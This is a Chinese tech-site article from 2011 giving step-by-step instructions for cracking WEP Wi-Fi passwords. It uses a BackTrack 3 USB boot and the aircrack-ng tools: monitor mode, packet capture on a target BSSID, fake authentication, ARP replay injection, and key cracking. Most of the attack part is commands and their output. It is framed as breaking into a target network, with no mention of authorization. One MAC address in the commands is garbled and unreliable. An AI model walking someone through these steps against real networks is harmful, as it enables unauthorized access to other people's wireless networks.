科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道应用安全破解WEP无线网络密码详细步骤

破解WEP无线网络密码详细步骤

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

一、先开始制作启动U盘:将下载好的backtrack3(BT3) usb版(下载地址在文章末尾)文件bt3b141207.rar直接解压到U盘(1G以上容量)。把Boot 和BT3两个文件夹放到U盘的根目录,打开BOOT文件夹双击运行" bootinst.bat "批处理文件。

来源:zdnet整理 2011年9月1日

关键字: 网络安全 无线网络

  • 评论
  • 分享微博
  • 分享邮件

  一、先开始制作启动U盘:将下载好的backtrack3(BT3) usb版(下载地址在文章末尾)文件bt3b141207.rar直接解压到U盘(1G以上容量)。把Boot 和BT3两个文件夹放到U盘的根目录,打开BOOT文件夹双击运行" bootinst.bat "批处理文件。U盘里就会多出4个文件." isolinux.boot" "isolinux.cfg" "isolinux.bin " "syslinux.cfg" (如果想要中文截面的BT3的菜单,就在下载BT3中文语言包。把压缩包里的"中文包"解压出来,将里面的*.lzm文件拷贝到u盘的BT3\modules目录,即可实现bt3中文化。)

  二、之后重启 windows 进入BIOS设置,把BIOS里的frist boot device设置为USB-HDD(或者是USB--ZIP)再重启选择从usb启动。系统进入backtrack3 系统。

  三、现在开始破解

  1.在shell窗口中输入 ifconfig 命令 ,出现如下信息:

  lo no wireless extensions.

  eth0 no wireless extensions.

  eth1 IEEE 802.11g ESSID:"" Nickname:""

  Mode:(......)Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82

  Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3

  Retry:off RTS thr:off Fragment thr:off

  Encryption key:off

  Power Management:off

  Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm

  Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0

  Tx excessive retries:0 Invalid misc:0 Missed beacon:0

  2.找出你的无线网卡名字,我这里是 eth1.再启动你的网卡为Moniter模式(输入airmon-ng start eth1 11)。再输入 ifconfig 命令 ,返回如下信息:

  lo no wireless extensions.

  eth0 no wireless extensions.

  eth1 IEEE 802.11g ESSID:"" Nickname:""

  Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82

  Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3

  Retry:off RTS thr:off Fragment thr:off

  Encryption key:off

  Power Management:off

  Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm

  Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0

  Tx excessive retries:0 Invalid misc:0 Missed beacon:0

  3. 输入命令 airodump-ng -c 11 --bssid 00:1A:01:8D:C3:B2 -w outputs eth1.

  命令中的11 表示要破解的频道号,bssid后面的数字表示破解目标的MAC物理地址,outputs表示要生成的包的名称。回车运行。

  4.再开一个 shell 输入 aireplay-ng -1 0 -e targetnet -a 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:7747.net:B6 eth1

  其中“targetnet”表示破解目标网络名,00:1A:01:8D:C3:B2前面已解释过是指目标MAC物理地址,00:A1:C1:D8:7747.net:B6表示本机网卡MAC物理地址

  5.再开一个 shell 输入 aireplay-ng -3 -b 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:7747.net:B6 eth1

  获取更多的数据包。

  6.返回数据量到1万的时候就可以破解了。再开一个shell输入 aircrack-ng -z -b 00:1A:01:8D:C3:B2 outputs.cap 进行破解。如果破解不成功,让它继续抓包,直到破解。

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章